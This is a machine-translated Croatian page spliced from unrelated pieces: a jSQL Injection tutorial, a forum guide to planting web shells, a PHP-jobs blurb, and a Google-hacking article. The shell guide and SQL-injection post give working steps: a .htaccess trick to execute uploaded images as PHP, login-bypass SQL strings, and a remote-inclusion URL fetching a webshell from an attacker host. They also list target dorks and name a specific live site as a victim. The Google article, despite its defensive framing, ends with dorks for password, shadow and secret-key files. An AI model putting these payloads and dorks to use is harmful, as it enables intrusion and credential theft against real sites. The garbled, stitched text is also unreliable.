Inurl php poglavlje broj osobni račun. Kako zaraditi poznavanjem PHP-a? Ne zaboravimo očito

Pokrenite preuzetu datoteku dvostrukim klikom (morate imati virtualni stroj ).

3. Anonimnost prilikom provjere stranice za SQL injekciju

Postavljanje Tor i Privoxy u Kali Linuxu

[Odjeljak u razvoju]

Postavljanje Tor i Privoxy na Windows

[Odjeljak u razvoju]

Proxy postavke u jSQL Injection

[Odjeljak u razvoju]

4. Provjera mjesta za SQL ubacivanje pomoću jSQL ubrizgavanja

Rad s programom je izuzetno jednostavan. Samo unesite adresu web stranice i pritisnite ENTER.

Sljedeća snimka zaslona pokazuje da je stranica ranjiva na tri vrste SQL injekcija (informacije o njima navedene su u donjem desnom kutu). Klikom na nazive injekcija možete promijeniti korištenu metodu:

Također, već su nam prikazane postojeće baze podataka.

Možete vidjeti sadržaj svake tablice:

Obično su najzanimljivija stvar kod tablica administratorske vjerodajnice.

Ako imate sreće i pronađete podatke administratora, onda je prerano radovati se. Još uvijek morate pronaći administrativnu ploču gdje ćete unijeti te podatke.

5. Potražite administrativne ploče s jSQL Injection

Da biste to učinili, idite na sljedeću karticu. Ovdje nas dočekuje popis mogućih adresa. Možete odabrati jednu ili više stranica za provjeru:

Pogodnost leži u činjenici da ne morate koristiti druge programe.

Nažalost, nema mnogo nemarnih programera koji lozinke pohranjuju u čistom tekstu. Vrlo često u retku zaporke vidimo nešto poput

8743b52063cd84097a65d1633f5c74f5

Ovo je hash. Možete ga dešifrirati korištenjem grube sile. I... jSQL Injection ima ugrađen brute forcer.

6. Brute force raspršivanje pomoću jSQL Injection

Nedvojbena pogodnost je da ne morate tražiti druge programe. Postoji podrška za mnoge od najpopularnijih hasheva.

Ovo nije najviše najbolja opcija. Da biste postali guru u dekodiranju hashova, preporučuje se knjiga “” na ruskom.

No, naravno, kada nemate drugog programa pri ruci ili nemate vremena za učenje, jSQL Injection sa svojom ugrađenom brute force funkcijom će vam dobro doći.

Postoje postavke: možete postaviti koji su znakovi uključeni u lozinku, raspon duljine lozinke.

7. Datotečne operacije nakon otkrivanja SQL injekcija

Osim operacija s bazama podataka - njihovo čitanje i modificiranje, ako se otkriju SQL injekcije, mogu se izvršiti sljedeće operacije s datotekama:

  • čitanje datoteka na poslužitelju
  • učitavanje novih datoteka na poslužitelj
  • učitavanje školjki na poslužitelj

I sve je to implementirano u jSQL Injection!

Postoje ograničenja - SQL poslužitelj mora imati privilegije za datoteke. Oni razumni administratori sustava oni su onemogućeni i pristup im sustav datoteka neće ga moći dobiti.

Prisutnost privilegija datoteke vrlo je jednostavno provjeriti. Idite na jednu od kartica (čitanje datoteka, stvaranje ljuske, učitavanje nove datoteke) i pokušajte izvršiti jednu od navedenih operacija.

Još jedna vrlo važna napomena - moramo znati točan apsolutni put do datoteke s kojom ćemo raditi - inače ništa neće raditi.

Pogledajte sljedeću sliku zaslona:

Na svaki pokušaj rada na datoteci dobivamo sljedeći odgovor: Nema privilegije FILE(bez privilegija datoteke). I tu se ništa ne može.

Ako umjesto toga imate drugu pogrešku:

Problem s pisanjem u [directory_name]

To znači da ste netočno naveli apsolutni put na koji želite napisati datoteku.

Kako biste pogodili apsolutni put, morate barem znati na kojem operativnom sustavu poslužitelj radi. Da biste to učinili, prijeđite na karticu Mreža.

Takav zapis (redak Win64) daje nam razloga za pretpostavku da imamo posla s Windows OS-om:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Veza: Keep-Alive Metoda: HTTP/1.1 200 OK Content-Length: 353 Datum: pet, 11. prosinca 2015. 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; skup znakova=UTF-8

Ovdje imamo neki Unix (*BSD, Linux):

Transfer-Encoding: chunked Datum: pet, 11. prosinca 2015. 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Veza: keep-alive Content-Type: text/html X- Pokreće: PHP/5.3.29 Poslužitelj: Apache/2.2.31 (Unix)

I ovdje imamo CentOS:

Metoda: HTTP/1.1 200 OK Istječe: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Veza: keep-alive X-Cache-Lookup: MISS od t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS od t1.hoster.ru Kontrola predmemorije: bez pohrane, bez predmemorije, mora se revalidirati, naknadna provjera=0, prethodna provjera=0 Pragma: bez predmemorije Datum: petak, 11. prosinca 2015. 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

U sustavu Windows tipična je mapa za web-mjesta C:\Poslužitelj\podaci\htdocs\. Ali, zapravo, ako je netko "mislio" napraviti poslužitelj na Windowsima, onda, vrlo vjerojatno, ta osoba nije čula ništa o privilegijama. Stoga biste trebali početi pokušavati izravno iz direktorija C:/Windows/:

Kao što vidite, prvi put je sve prošlo dobro.

Ali same ljuske jSQL Injection izazivaju sumnje u mom umu. Ako imate privilegije za datoteke, možete jednostavno učitati nešto putem web sučelja.

8. Skupna provjera stranica za SQL injekcije

Čak je i ova funkcija dostupna u jSQL Injection. Sve je vrlo jednostavno - preuzmite popis stranica (možete uvesti iz datoteke), odaberite one koje želite provjeriti i kliknite odgovarajući gumb za početak operacije.

Zaključak iz jSQL Injection

jSQL Injection je dobar, moćan alat za pretraživanje i korištenje SQL injekcija koje se nalaze na web stranicama. Njegove nedvojbene prednosti: jednostavnost korištenja, ugrađene povezane funkcije. jSQL Injection može postati najbolji prijatelj novi u analizi web stranica.

Od nedostataka bih istaknuo nemogućnost uređivanja baza podataka (po barem Nisam pronašao ovu funkciju). Kao i svi instrumenti sa grafičko sučelje, jedan od nedostataka ovog programa može se pripisati nemogućnosti korištenja u skriptama. Ipak, u ovom programu moguća je i određena automatizacija - zahvaljujući ugrađenoj funkciji masovnog skeniranja web mjesta.

utvrđeni uzorak i potvrda. Po poseban popust za sve fakultete i smjerove!

Pojavom računala i interneta pojavila su se mnoga dodatna zanimanja.


Stručnjaci za programiranje sada su traženi jer se putem Interneta pokreće mnogo različitih projekata. Stoga bi svi kandidati trebali razmisliti o odabiru specijalnosti vezane uz računala.

Kako zaraditi poznavanjem PHP-a? U ovom članku ćemo pogledati jedno od područja programiranja. Skriptni jezik se aktivno koristi za razvoj aplikacija.

Tehnologija je relevantna već dugi niz godina, a ako naučite PHP, možete dobro zaraditi. Najvažnije je da je potražnja za stručnjacima u ovoj oblasti ogromna.

Koliko zarađuje PHP programer?

Nemoguće je navesti točan iznos, jer svi rade različite tvrtke, a neki rade i od kuće. U svakom slučaju, aktivni radnici imaju dobru plaću.

Oni koji rade ne izlazeći iz kuće dobivaju točno onoliko koliko uspiju izvršiti narudžbi. Cijene u niši se rijetko određuju, najčešće se dogovaraju pojedinačno.

Na pozitivnoj strani PHP rad Kao programer, vrijedi istaknuti ozbiljne izglede i relevantnost aktivnosti. U vrijeme kada internet prodire u gotovo sva područja, raditi kao programer zaista je isplativo.


U ovom članku želim govoriti o najčešće korištenim metodama učitavanja ljuske na web mjesto. Web-ljuska je vrsta zlonamjerne skripte (programa) koju napadači koriste za kontrolu web stranica ili poslužitelja.

Metoda 1
Pronađite obrazac na web stranici za učitavanje datoteka/slika. Recimo da nismo uspjeli hakirati administratorsku ploču web-lokacije i pokušavamo preplaviti svoju ljusku s proširenje.php.jpg . U slučaju uspjeha, vidjet ćemo bijeli prozor umjesto slike, kliknemo desnom tipkom miša i slijedimo vezu. U slučaju kvara možemo koristiti kromirani nastavak tampirati podatke. Omogućuje vam presretanje i promjenu zahtjeva kako želite. Ako stranica provjerava ekstenziju datoteke, prvo možemo učitati .htaccess datoteka sa sadržajem:
AddType aplikacija/x-httpd-php .jpg
Ova naredba će poslužiti jpg datoteke kao php.
Detaljne video upute:

Video upute za instalacija tamper podataka:


Metoda 2
Upotrijebite program za traženje administratorskih panela na stranici - https://github.com/bdblackhat/admin-panel-finder. Kada program pronađe administrativnu ploču, možemo isprobati sql-injection. U polje za prijavu i lozinku na web mjestu unosimo kod:

" ili "1"="1 " ILI 1=1/*

Ako radi, dolazimo do administratorske ploče i Nastavljamo prema metodi 1. Ako nema sql-injection-a u administratorskoj ploči na web-mjestu, možemo pokušati otkloniti pogreške ili pronaći exploit za ovaj CMS.
Detaljne video upute:


Metoda 3
U metodi 3 tražit ćemo sql-injection na samom mjestu. To možemo učiniti ručno ili koristiti sqlmap. Na forumu ima dovoljno tema o tome kako provoditi injekcije, pa ću doći izdaleka. Dakle, sada smo već pronašli tablicu s administratorskom prijavom i lozinkom, dešifrirajte hashove, idite na administrativnu ploču i radujte se. Ali recimo da nismo mogli dešifrirati lozinku i sve je pošlo po zlu, tada moramo provjeriti privilegije našeg korisnika . Provjeravamo privilegije i učitavamo mini-ljusku. Iz nekog razloga, kada želim zalijepiti kod, stranica mi daje pogrešku.

Metoda 4
Metoda 4 podrazumijeva csrf napad. U donjem kodu moramo zamijeniti http:// na našu ciljnu vezu. Odaberite školjku i pritisnite tipku Učitaj.



Metoda 5
Saznajte više o svojoj meti i pronađite eksploataciju. Za to postoji vrlo zanimljiva web stranica - https://www.exploit-db.com. Nitko nije otkazao masovno hakiranje web stranica kroz ranjivosti, ali o tome već postoji članak na obrascu.

Postoji mnogo više načina za punjenje školjke i nema smisla govoriti o svakom od njih. Ako želite vježbati, instalirajte dvwa - to je program osmišljen kako bi pomogao sigurnosnim stručnjacima da testiraju svoje vještine i alate u legalnom okruženju.

Metoda 6
Php injekcija- ovo je oblik napada na web stranicu kada napadač ubaci svoj PHP kod u napadnutu PHP aplikaciju.

www.site.ru?page=home.html
Izvođenjem naredbe učitati ćemo početnu,html stranicu. Sada ćemo pokušati učitati zlonamjernu ljusku.
www.site.ru?page=http:/hacker.ru/webshell.php
glupan: Inurl:stranica=

Također postoji način da se pomoću perla pronađe već učitana ljuska

I tako, sada ću vam reći kako hakirati nešto bez posebnog znanja. Odmah ću reći da od ovoga ima malo koristi, ali ipak.
Prvo morate pronaći same stranice. Da biste to učinili, idite na google.com i potražite dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

evo malog popisa. Možete koristiti svoje. I tako, pronašli smo mjesto. Na primjer http://www.vestitambov.ru/
Zatim preuzmite ovaj program

**Skriveni sadržaj: da biste vidjeli ovaj skriveni sadržaj, vaš broj postova mora biti 3 ili više.**

Pritisnite OK. Zatim umećemo mjesto žrtve.
Pritisnemo start. Dalje čekamo rezultate.
I tako je program pronašao SQL ranjivost.

Zatim preuzmite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= tamo zalijepite primljenu vezu. Neću objašnjavati kako koristiti Havij i gdje ga preuzeti; nije ga teško pronaći. Svi. Dobili ste potrebne podatke - administratorsku lozinku, a dalje je na vašoj mašti.

p.s. Ovo je moj prvi pokušaj da nešto napišem. Oprostite ako nešto nije u redu

Pretraživač Google sustav(www.google.com) nudi mnoge mogućnosti pretraživanja. Sve ove značajke neprocjenjiv su alat za pretraživanje za korisnika koji je tek na Internetu, au isto vrijeme još moćnije oružje invazije i uništenja u rukama ljudi sa zlim namjerama, uključujući ne samo hakere, već i ne-računalne kriminalce i čak i teroristi.
(9475 pregleda u 1 tjednu)

Denis Barankov
denisNOSPAMixi.ru

Pažnja:Ovaj članak nije vodič za djelovanje. Ovaj članak je napisan za vas, administratore WEB poslužitelja, kako biste izgubili lažni osjećaj da ste sigurni i konačno shvatili podmuklost ovakvog načina dobivanja informacija i prihvatili se zaštite svoje stranice.

Uvod

Na primjer, pronašao sam 1670 stranica za 0,14 sekundi!

2. Unesite drugi red, na primjer:

inurl:"auth_user_file.txt"

malo manje, ali to je već dovoljno za besplatno preuzimanje i pogađanje lozinke (koristeći istog Johna The Rippera). U nastavku ću navesti još nekoliko primjera.

Dakle, morate shvatiti da je tražilica Google posjetila većinu internetskih stranica i pohranila informacije sadržane na njima. Ove predmemorirane informacije omogućuju vam da dobijete informacije o web-mjestu i sadržaju web-mjesta bez izravnog povezivanja s web-mjestom, samo udubljivanjem u informacije koje su pohranjene unutar Googlea. Štoviše, ako informacije na web-mjestu više nisu dostupne, informacije u predmemoriji još uvijek mogu biti sačuvane. Sve što trebate za ovu metodu: znati nešto ključne riječi Google. Ova tehnika se zove Google hakiranje.

Informacije o Google hakiranju prvi put su se pojavile na Bugtruck mailing listi prije 3 godine. Godine 2001. ovu je temu pokrenuo francuski student. Ovdje je poveznica na ovo pismo http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Pruža prve primjere takvih upita:

1) Indeks /admin
2) Indeks /lozinke
3) Indeks /mail
4) Indeks / +banques +filetype:xls (za Francusku...)
5) Indeks / +passwd
6) Indeks / password.txt

Ova je tema nedavno uzburkala engleski čitateljski dio interneta: nakon članka Johnnyja Longa, objavljenog 7. svibnja 2004. Za potpunije proučavanje Google hakiranja, savjetujem vam da posjetite web stranicu ovog autora http://johnny.ihackstuff.com. U ovom članku samo vas želim upoznati s novostima.

Tko ovo može koristiti:
- Novinari, špijuni i svi oni koji vole zabadati nos u tuđe poslove mogu to iskoristiti za traženje inkriminirajućih dokaza.
- Hakeri koji traže pogodne mete za hakiranje.

Kako Google radi.

Za nastavak razgovora, podsjetit ću vas na neke od ključnih riječi koje se koriste u Google upitima.

Pretražujte pomoću znaka +

Google iz pretraživanja isključuje riječi koje smatra nevažnima. Na primjer, upitne riječi, prijedlozi i članovi u Engleski jezik: na primjer su, od, gdje. Na ruskom, čini se da Google sve riječi smatra važnima. Ako je riječ isključena iz pretraživanja, Google piše o tome. Do Google je počeo da biste tražili stranice s ovim riječima, trebate dodati znak + bez razmaka prije riječi. Na primjer:

as +baze

Traži pomoću znaka –

Ako Google pronađe velik broj stranica s kojih treba isključiti stranice s određenom temom, tada možete natjerati Google da traži samo stranice koje ne sadrže određene riječi. Da biste to učinili, morate naznačiti ove riječi stavljanjem znaka ispred svake - bez razmaka ispred riječi. Na primjer:

ribolov - votka

Pretraživanje pomoću ~

Možda želite pretraživati ​​ne samo navedenu riječ, već i njezine sinonime. Da biste to učinili, ispred riječi stavite simbol ~.

Pronalaženje točne fraze pomoću dvostrukih navodnika

Google pretražuje na svakoj stranici sva pojavljivanja riječi koje ste napisali u nizu upita i ne mari za relativni položaj riječi, sve dok se sve navedene riječi nalaze na stranici u isto vrijeme (ovo je zadana radnja). Da biste pronašli točnu frazu, morate je staviti u navodnike. Na primjer:

"podupirač za knjige"

Da bi se barem jedna od navedenih riječi pojavila, morate navesti logična operacija eksplicitno: ILI. Na primjer:

sigurnost knjige ILI zaštita

Osim toga, možete upotrijebiti znak * u traci za pretraživanje da označite bilo koju riječ i. predstavljati bilo koji lik.

Tražite riječi pomoću dodatni operatori

postojati operatori pretraživanja, koji su navedeni u nizu za pretraživanje u formatu:

operator:traži_pojam

Razmaci pored dvotočke nisu potrebni. Ako umetnete razmak iza dvotočke, vidjet ćete poruku o pogrešci, a prije nje Google će ih koristiti kao uobičajeni niz za pretraživanje.
Postoje grupe dodatnih operatora pretraživanja: jezici - naznačite na kojem jeziku želite vidjeti rezultat, datum - ograničite rezultate za zadnja tri, šest ili 12 mjeseci, pojave - naznačite gdje u dokumentu trebate tražiti redak: posvuda, u naslovu, u URL-u, domene - pretražite na određenom web-mjestu ili ga, obrnuto, isključite iz pretraživanja; sigurno pretraživanje - blokira web-mjesta koja sadrže određenu vrstu informacija i uklanja ih sa stranica rezultata pretraživanja.
Međutim, neki operatori ne zahtijevaju dodatni parametar, na primjer zahtjev " predmemorija:www.google.com" se može nazvati kao punopravni niz za pretraživanje, a neke ključne riječi, naprotiv, zahtijevaju riječ za pretraživanje, na primjer " site:www.google.com pomoć". U svjetlu naše teme, pogledajmo sljedeće operatore:

Operater

Opis

Zahtijeva li dodatni parametar?

pretraži samo na stranici navedenoj u search_term

traži samo u dokumentima s tipom search_term

pronaći stranice koje sadrže search_term u naslovu

pronaći stranice koje sadrže sve riječi search_term u naslovu

pronaći stranice koje sadrže riječ search_term u svojoj adresi

pronaći stranice koje sadrže sve riječi search_term u svojoj adresi

Operater stranica: ograničava pretraživanje samo na navedeno mjesto, a možete odrediti ne samo Naziv domene, ali i IP adresu. Na primjer, unesite:

Operater Vrsta datoteke: Ograničava pretraživanje na određenu vrstu datoteke. Na primjer:

Od datuma objave članka, Google može pretraživati ​​unutar 13 različitih formata datoteka:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint(ppt)
  • Microsoft Word(dok)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Format obogaćenog teksta (rtf)
  • Shockwave Flash(swf)
  • Tekst (ans, txt)

Operater veza: prikazuje sve stranice koje upućuju na navedenu stranicu.
Vjerojatno je uvijek zanimljivo vidjeti koliko mjesta na Internetu zna za vas. Pokušajmo:

Operater predmemorija: Prikazuje verziju web-mjesta u Googleovoj predmemoriji kako je izgledala zadnji put kada je Google posjetio tu stranicu. Uzmimo bilo koje mjesto koje se često mijenja i pogledajmo:

Operater naslov: traži navedenu riječ u naslovu stranice. Operater sav naslov: je proširenje - pretražuje svih navedenih nekoliko riječi u naslovu stranice. Usporedi:

naslov:let na Mars
intitle:let intitle:on intitle:mars
allintitle:let na mars

Operater inurl: prisiljava Google da prikaže sve stranice koje sadrže navedeni niz u URL-u. allinurl operator: traži sve riječi u URL-u. Na primjer:

allinurl:acid acid_stat_alerts.php

Ova naredba je posebno korisna za one koji nemaju SNORT - barem mogu vidjeti kako radi na stvarnom sustavu.

Metode hakiranja pomoću Googlea

Dakle, saznali smo da korištenjem kombinacije gore navedenih operatora i ključnih riječi svatko može prikupiti potrebne informacije i tražiti ranjivosti. Te se tehnike često nazivaju Google hakiranje.

Karta stranice

Možete koristiti site: operator za popis svih veza koje je Google pronašao na web mjestu. Tipično, stranice koje su dinamički stvorene skriptama nisu indeksirane pomoću parametara, pa neka mjesta koriste ISAPI filtre tako da veze nisu u obliku /article.asp?num=10&dst=5, i s kosim crtama /članak/abc/broj/10/dst/5. To se radi kako bi tražilice generalno indeksirale stranicu.

Pokušajmo:

web mjesto:www.whitehouse.gov bijela kuća

Google misli da svaka stranica na web stranici sadrži riječ whitehouse. To je ono što koristimo za dobivanje svih stranica.
Postoji i pojednostavljena verzija:

web mjesto:whitehouse.gov

A najbolji dio je što drugovi iz whitehouse.gov nisu ni znali da smo pogledali strukturu njihove stranice i čak pogledali predmemorirane stranice koje je Google preuzeo. Ovo se može koristiti za proučavanje strukture web-mjesta i pregled sadržaja, ostajući zasad neotkriveni.

Pregledajte popis datoteka u direktorijima

WEB poslužitelji mogu prikazati popise direktorija poslužitelja umjesto uobičajenih HTML stranice. To se obično radi kako bi se osiguralo da korisnici odaberu i preuzmu određene datoteke. Međutim, u mnogim slučajevima administratori nemaju namjeru prikazati sadržaj imenika. To se događa zbog neispravne konfiguracije poslužitelja ili nedostatka početna stranica u imeniku. Kao rezultat toga, haker ima priliku pronaći nešto zanimljivo u imeniku i iskoristiti to za vlastite svrhe. Da biste pronašli sve takve stranice, dovoljno je primijetiti da sve sadrže riječi: indeks od. Ali budući da indeks riječi ne sadrži samo takve stranice, moramo pročistiti upit i uzeti u obzir ključne riječi na samoj stranici, tako da upiti poput:

intitle:index.of nadređenog imenika
intitle:index.od veličina imena

Budući da je većina popisa imenika namjerna, možda će vam biti teško prvi put pronaći pogrešno postavljene popise. Ali barem već možete koristiti popise za određivanje WEB verzije poslužitelj kao što je opisano u nastavku.

Dobivanje verzije WEB poslužitelja.

Poznavanje verzije WEB poslužitelja uvijek je korisno prije pokretanja bilo kakvog hakerskog napada. Opet, zahvaljujući Googleu, možete dobiti ove informacije bez povezivanja na poslužitelj. Ako pažljivo pogledate popis imenika, možete vidjeti da su tamo prikazani naziv WEB poslužitelja i njegova verzija.

Apache1.3.29 - ProXad poslužitelj na trf296.free.fr priključak 80

Iskusni administrator može promijeniti ove podatke, ali, u pravilu, oni su istiniti. Dakle, za dobivanje ove informacije dovoljno je poslati zahtjev:

intitle:index.of server.at

Da bismo dobili informacije za određeni poslužitelj, razjašnjavamo zahtjev:

intitle:index.of server.at site:ibm.com

Ili obrnuto, tražimo poslužitelje koji rade specifična verzija poslužitelji:

intitle:index.of Apache/2.0.40 poslužitelj na

Ovu tehniku ​​haker može koristiti da pronađe žrtvu. Ako, na primjer, ima exploit za određenu verziju WEB poslužitelja, onda ga može pronaći i isprobati postojeći exploit.

Verziju poslužitelja možete dobiti i pregledom stranica koje su zadano instalirane prilikom instalacije najnovije verzije WEB poslužitelja. Na primjer, vidjeti testna stranica Apache 1.2.6 samo upišite

intitle:Test.Page.for.Apache to.radi!

Štoviše, neki OS Tijekom instalacije odmah instaliraju i pokreću WEB poslužitelj. Međutim, neki korisnici toga nisu ni svjesni. Naravno, ako vidite da netko nije uklonio zadanu stranicu, onda je logično pretpostaviti da računalo uopće nije bilo podvrgnuto prilagodbi i da je vjerojatno ranjivo na napad.

Pokušajte pretražiti IIS 5.0 stranice

allintitle:Dobro došli u Windows 2000 Internet usluge

U slučaju IIS-a možete odrediti ne samo verziju poslužitelja, već i Windows verzija i servisni paket.

Drugi način za određivanje verzije WEB poslužitelja je traženje priručnika (stranica pomoći) i primjera koji mogu biti instalirani na stranici prema zadanim postavkama. Hakeri su pronašli dosta načina za korištenje ovih komponenti za dobivanje privilegiranog pristupa web mjestu. Zato ove komponente morate ukloniti na mjestu proizvodnje. Da ne spominjemo činjenicu da se prisutnost ovih komponenti može koristiti za dobivanje informacija o vrsti poslužitelja i njegovoj verziji. Na primjer, pronađimo priručnik za apache:

inurl:ručni moduli apache direktiva

Korištenje Googlea kao CGI skenera.

CGI skener ili WEB skener je pomoćni program za traženje ranjivih skripti i programa na poslužitelju žrtve. Ovi uslužni programi moraju znati što tražiti, za to imaju cijeli popis ranjivih datoteka, na primjer:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/skripte/cphost.dll
/cgi-bin/finger.cgi

Svaku od ovih datoteka možemo pronaći pomoću koristeći Google, koristeći dodatno uz naziv datoteke u retku za pretraživanje riječi index of ili inurl: možemo pronaći stranice s ranjivim skriptama, na primjer:

allinurl:/random_banner/index.cgi

Koristeći dodatno znanje, haker može iskoristiti ranjivost skripte i upotrijebiti tu ranjivost da natjera skriptu da emitira bilo koju datoteku pohranjenu na poslužitelju. Na primjer, datoteka zaporke.

Kako se zaštititi od Google hakiranja.

1. Ne objavljujte važne podatke na WEB poslužitelju.

Čak i ako ste podatke objavili privremeno, možete zaboraviti na njih ili će netko imati vremena pronaći i uzeti te podatke prije nego što ih izbrišete. nemoj to raditi Postoje mnogi drugi načini prijenosa podataka koji ih štite od krađe.

2. Provjerite svoju stranicu.

Koristite opisane metode za istraživanje svoje stranice. Povremeno provjeravajte svoje web mjesto za nove metode koje se pojavljuju na web mjestu http://johnny.ihackstuff.com. Ne zaboravite da ako želite automatizirati svoje radnje, morate dobiti posebno dopuštenje od Googlea. Ako pažljivo čitate http://www.google.com/terms_of_service.html, tada ćete vidjeti izraz: Ne smijete slati automatizirane upite bilo koje vrste Googleovom sustavu bez prethodnog izričitog dopuštenja Googlea.

3. Možda vam Google neće trebati za indeksiranje vaše stranice ili njenog dijela.

Google vam dopušta uklanjanje veze na vašu stranicu ili njezin dio iz svoje baze podataka, kao i uklanjanje stranica iz predmemorije. Osim toga, možete zabraniti pretraživanje slika na vašoj stranici, zabraniti prikazivanje kratkih fragmenata stranica u rezultatima pretraživanja. Sve mogućnosti za brisanje stranice opisane su na stranici http://www.google.com/remove.html. Da biste to učinili, morate potvrditi da ste stvarno vlasnik ove stranice ili umetnuti oznake na stranicu ili

4. Koristite robots.txt

Poznato je da tražilice gledaju datoteku robots.txt koja se nalazi u korijenu stranice i ne indeksiraju one dijelove koji su označeni riječju Zabraniti. Ovo možete koristiti kako biste spriječili indeksiranje dijela stranice. Na primjer, kako biste spriječili indeksiranje cijele stranice, izradite datoteku robots.txt koja sadrži dva retka:

Korisnički agent: *
Zabrani: /

Što se još događa

Kako vam život ne bi izgledao kao med, reći ću na kraju da postoje stranice koje prate one ljude koji, koristeći gore navedene metode, traže rupe u skriptama i WEB poslužiteljima. Primjer takve stranice je

Primjena.

Malo slatko. Pokušajte sami nešto od sljedećeg:

1. #mysql dump filetype:sql - traženje dumpova baze podataka mySQL podataka
2. Sažeto izvješće o ranjivosti glavnog računala - pokazat će vam koje su ranjivosti drugi ljudi pronašli
3. phpMyAdmin radi na inurl:main.php - ovo će prisiliti kontrolu da se zatvori kroz phpmyadmin panel
4. nije za distribuciju povjerljivo
5. Varijable poslužitelja kontrolnog stabla pojedinosti zahtjeva
6. Trčanje u dječjem načinu rada
7. Ovo izvješće generirao je WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – možda nekome trebaju konfiguracijske datoteke vatrozida? :)
10. intitle:index.of finances.xls – hmm....
11. intitle: Indeks dbconvert.exe razgovora – icq zapisnici razgovora
12.intext:Tobias Oetiker analiza prometa
13. intitle: Statistika korištenja za Genered by Webalizer
14. intitle: statistika napredne web statistike
15. intitle:index.of ws_ftp.ini – ws ftp konfiguracija
16. inurl:ipsec.secrets čuva zajedničke tajne - tajni ključ - dobar nalaz
17. inurl:main.php Dobro došli u phpMyAdmin
18. inurl:server-info Informacije o Apache poslužitelju
19. site:edu admin ocjene
20. ORA-00921: neočekivani kraj SQL naredbe – dobivanje staza
21. intitle:index.of trillian.ini
22. naslov:Kazalo pwd.db
23.naslov:indeks.ljudi.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle: Indeks .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:izvedi filetype:ini

